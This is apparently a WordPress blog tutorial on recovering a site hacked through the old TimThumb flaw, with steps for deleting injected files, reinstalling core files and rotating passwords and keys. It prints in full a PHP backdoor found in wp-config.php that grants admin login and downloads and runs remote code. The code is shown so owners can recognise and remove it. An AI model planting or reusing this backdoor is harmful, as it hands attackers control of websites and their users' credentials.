Beginner's Guide for WordPress - Start your WordPress Blog in minutes.
Choosing the Best
WordPress Hosting
How to Easily
Install WordPress
Recommended
WordPress Plugins
View all Guides

How to Fix and Cleanup the TimThumb Hack in WordPress

Last updated on by
Elegant Themes
How to Fix and Cleanup the TimThumb Hack in WordPress

So if you remember correctly, there was a security issue with the TimThumb script in August which was fixed. However still to our surprise, many sites are still using the old version. We have fixed three sites so far in the past month, one being yesterday. So it makes sense to simply write a step by step article, so our users can just follow it. All of the three users that we fix this issue for did not even know what TimThumb was or whether they were using it or not.

TimThumb is a PHP script that resizes images. There was a vulnerability in it, but it is SAFE to use now.

So how do you know that your site is hacked? If you see a big red screen on your browser when visiting to your site:

Something's not Right Here

If you start getting bombarded with emails about users being redirected from your site. Most likely, the case is that your site was a victim of this exploit.

As a pro-cautionary measure, everyone should just use this Timthumb Vulnerability Scanner. This will tell you if you are using the older version of TimThumb. A lot of theme clubs upgraded their core right away. So this plugin will check if the new secure version of Timthumb is installed or an older version is installed.

Now if your site already fell prey to this Timthumb exploit, then here is what you need to do.

First you need to delete the following files:

/wp-admin/upd.php
/wp-content/upd.php

Log into WordPress admin panel and reinstall your WordPress version. We are specifically looking to reinstall these files:

/wp-settings.php
/wp-includes/js/jquery/jquery.js
/wp-includes/js/110n.js

Then open your wp-config.php where you will most likely find this big malware code that is harvesting login credentials and cookies. This code will be towards the bottom.

if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
if ($_GET['pass'] == '19ca14e7ea6328a42e0eb13d585e4c22'){
if ($_GET['pingnow']== 'login'){
$user_login = 'admin';
$user = get_userdatabylogin($user_login);
$user_id = $user->ID;
wp_set_current_user($user_id, $user_login);
wp_set_auth_cookie($user_id);
do_action('wp_login', $user_login);
}
if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
$fnm = md5(rand(0,100)).'.php';
$fp = fopen($fnm, "w");
curl_setopt($ch, CURLOPT_FILE, $fp);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
curl_exec($ch);
curl_close($ch);
fclose($fp);
echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
}
if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
$ch = curl_init($_GET['file']);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 5);
$re = curl_exec($ch);
curl_close($ch);
eval($re);
}}}

In your theme’s folder, look for anywhere the TimThumb script may be storing the cached files. Usually they are in this structure:

/wp-content/themes/themename/scripts/cache/external_{MD5Hash}.php
/wp-content/themes/themename/temp/cache/external_{MD5Hash}.php

Delete everything that looks like this. If you are not sure about things, then delete everything that is not an image file.

Next thing you want to do is replace timthumb.php with the latest version which can be found at http://timthumb.googlecode.com/svn/trunk/timthumb.php

Now it would be a good idea to change your passwords starting with your MySQL login info to your WordPress login info. Don’t forget to change the password for MySQL in wp-config.php or you will get “Error Establishing Connection” screen.

Change the secret keys in your wp-config.php file. You can generate a new key by going to the online generator.

Now you are done. Don’t forget to empty all page caching plugins. As a cautionary measure, it is good to clear your browsers cache and cookies as well.

For developers, try using the Additional Image Sizes feature in WordPress to replace the Timthumb functionalities.

Let us know if you need further assistance by using our contact form.


Editorial Staff at WPBeginner is a team of WordPress lovers led by Syed Balkhi. Page maintained by Syed Balkhi.

WPBeginner's Video Icon
Our HD-Quality tutorial videos for WordPress Beginners will teach you how to use WordPress to create and manage your own website in about an hour. Get started now »

Comments

  1. MichealKennedy says:

    Would have been useful a week ago BEFORE I got hacked! >:| Lol. But thanks!

  2. doulce says:

    The best way to fix Timthumb is to remove it completely. Anyway Timthumb is not the best way to resize images. you can use the built-in functionality from wordpress add_image_size + a plugin called Thumbnail Regenerate. So simple.

Add a Comment

We're glad you have chosen to leave a comment. Please keep in mind that all comments are moderated according to our comment policy, and all links are nofollow. Do NOT use keywords in the name field. Let's have a personal and meaningful conversation.